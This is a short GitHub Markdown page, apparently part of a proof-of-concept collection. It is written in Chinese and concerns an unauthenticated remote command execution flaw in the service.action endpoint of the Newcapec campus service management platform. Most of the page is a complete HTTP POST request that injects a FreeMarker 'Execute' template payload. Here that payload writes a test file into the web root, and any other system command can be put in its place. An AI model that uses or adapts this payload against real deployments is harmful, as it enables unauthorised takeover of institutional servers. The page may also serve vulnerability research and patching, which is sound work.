Skip to content

Latest commit

 

History

History
24 lines (18 loc) · 1.07 KB

新开普掌上校园服务管理平台service.action远程命令执行.md

File metadata and controls

24 lines (18 loc) · 1.07 KB

新开普掌上校园服务管理平台service.action远程命令执行

新开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。

POC

POST /service_transport/service.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{  "command": "GetFZinfo",  "UnitCode": "<#assign ex = "freemarker.template.utility.Execute"  ?new()>${ex("cmd /c echo 123 >./webapps/ROOT/test.txt")}"}

image image